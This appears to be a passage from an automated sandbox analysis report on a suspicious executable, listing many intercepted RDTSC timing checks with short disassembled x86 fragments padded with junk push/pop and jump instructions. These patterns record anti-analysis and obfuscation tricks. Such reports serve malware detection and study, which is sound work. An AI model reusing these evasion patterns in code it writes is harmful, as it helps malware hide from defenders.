                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0821 second address: 0000000004DA0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0825 second address: 0000000004DA0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0829 second address: 0000000004DA082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30B5E second address: 0000000004D30B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30B64 second address: 0000000004D30B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30B68 second address: 0000000004D30BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov al, bh 0x00000012 pushfd 0x00000013 jmp 00007F7E95375D06h 0x00000018 xor cl, FFFFFF98h 0x0000001b jmp 00007F7E95375CFBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30BB0 second address: 0000000004D30BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E954D64B8h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30BEC second address: 0000000004D30BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30BFB second address: 0000000004D30C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C01 second address: 0000000004D30C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C05 second address: 0000000004D30C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C16 second address: 0000000004D30C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C1A second address: 0000000004D30C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C1E second address: 0000000004D30C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D30C24 second address: 0000000004D30C3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA05B2 second address: 0000000004DA05CF instructions: 0x00000000 rdtsc 0x00000002 mov si, CB77h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F7E95375CFAh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA05CF second address: 0000000004DA05D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70CDD second address: 0000000004D70CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70CE3 second address: 0000000004D70CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70CE8 second address: 0000000004D70CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E95375D03h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DC04A7 second address: 0000000004DC04AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DC04AB second address: 0000000004DC04BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DC04BE second address: 0000000004DC051F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6EDAh 0x00000007 call 00007F7E954D64ABh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 movsx edi, cx 0x00000016 pop eax 0x00000017 jmp 00007F7E954D64ADh 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F7E954D64B3h 0x00000027 and ah, FFFFFF8Eh 0x0000002a jmp 00007F7E954D64B9h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DC051F second address: 0000000004DC053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, di 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0DA8 second address: 0000000004DA0DD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E954D64B7h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0DD6 second address: 0000000004DA0DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0DDC second address: 0000000004DA0E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7E954D64ABh 0x00000013 adc ax, 338Eh 0x00000018 jmp 00007F7E954D64B9h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0E22 second address: 0000000004DA0E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0E26 second address: 0000000004DA0E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0E2C second address: 0000000004DA0E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0E32 second address: 0000000004DA0E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0E36 second address: 0000000004DA0E84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edi, 0F35AF50h 0x00000015 pushfd 0x00000016 jmp 00007F7E95375D09h 0x0000001b add ax, A7D6h 0x00000020 jmp 00007F7E95375D01h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0E84 second address: 0000000004DA0EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7112h 0x00000007 mov si, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E954D64B0h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D40280 second address: 0000000004D40286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D40286 second address: 0000000004D4029B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64AAh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D4029B second address: 0000000004D402A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D402A1 second address: 0000000004D402A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D402A5 second address: 0000000004D402A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0651 second address: 0000000004DA0657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0C5D second address: 0000000004DA0C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0C84 second address: 0000000004DA0C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0C88 second address: 0000000004DA0C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DA0C8C second address: 0000000004DA0C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70B6F second address: 0000000004D70B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70B75 second address: 0000000004D70B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70B7A second address: 0000000004D70BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7E95375CFEh 0x0000000a sbb eax, 379BBB48h 0x00000010 jmp 00007F7E95375CFBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F7E95375CFBh 0x00000023 or eax, 23BA7D8Eh 0x00000029 jmp 00007F7E95375D09h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F7E95375D00h 0x00000035 xor al, 00000008h 0x00000038 jmp 00007F7E95375CFBh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70BF3 second address: 0000000004D70C0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, 6B38h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E954D64ADh 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70C0F second address: 0000000004D70C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e pushfd 0x0000000f jmp 00007F7E95375D08h 0x00000014 sbb ah, FFFFFFF8h 0x00000017 jmp 00007F7E95375CFBh 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov ecx, 23D2114Bh 0x00000026 mov ax, 7727h 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70C66 second address: 0000000004D70C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70C6A second address: 0000000004D70C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70C70 second address: 0000000004D70C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64ADh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0056 second address: 0000000004DB005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB005C second address: 0000000004DB0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0078 second address: 0000000004DB008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB008B second address: 0000000004DB00C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7E954D64B8h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB00C6 second address: 0000000004DB00CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB00CA second address: 0000000004DB00D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB00D0 second address: 0000000004DB00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E95375CFDh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D50991 second address: 0000000004D509CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 jmp 00007F7E954D64B7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E954D64B5h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D509CA second address: 0000000004D509D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D509D0 second address: 0000000004D509D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D509D4 second address: 0000000004D509D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0C70 second address: 0000000004DB0C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0C76 second address: 0000000004DB0CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7E95375CFFh 0x00000013 or ch, FFFFFFAEh 0x00000016 jmp 00007F7E95375D09h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ax, E00Dh 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0CBC second address: 0000000004DB0CDB instructions: 0x00000000 rdtsc 0x00000002 call 00007F7E954D64AAh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E954D64ACh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0CDB second address: 0000000004DB0D41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7E95375D01h 0x00000008 pop eax 0x00000009 mov edi, 48EACD34h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 jmp 00007F7E95375D03h 0x00000018 xchg eax, ecx 0x00000019 jmp 00007F7E95375D06h 0x0000001e push eax 0x0000001f pushad 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7E95375D05h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0D41 second address: 0000000004DB0D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64ACh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0D51 second address: 0000000004DB0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0D55 second address: 0000000004DB0DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [774365FCh] 0x0000000d jmp 00007F7E954D64B7h 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 push eax 0x00000016 mov dx, 53C6h 0x0000001a pop edx 0x0000001b pushfd 0x0000001c jmp 00007F7E954D64ACh 0x00000021 jmp 00007F7E954D64B5h 0x00000026 popfd 0x00000027 popad 0x00000028 je 00007F7F07AD9066h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov esi, ebx 0x00000033 mov dx, 890Ah 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB02A8 second address: 0000000004DB02AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB02AE second address: 0000000004DB02B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB02B2 second address: 0000000004DB0327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, 3B54h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F7E95375CFFh 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e mov di, cx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 jmp 00007F7E95375CFAh 0x0000002a and dword ptr [eax], 00000000h 0x0000002d jmp 00007F7E95375D00h 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7E95375D07h 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0327 second address: 0000000004DB032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7000A second address: 0000000004D7000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7000F second address: 0000000004D70023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64B0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70023 second address: 0000000004D70027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70115 second address: 0000000004D70128 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 4E49A768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70128 second address: 0000000004D7012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7012D second address: 0000000004D70133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D70133 second address: 0000000004D7014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004D7014B second address: 0000000004D7019C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 movzx eax, bx 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e mov ax, CA2Fh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F7E954D64B7h 0x0000001f adc si, 2D6Eh 0x00000024 jmp 00007F7E954D64B9h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
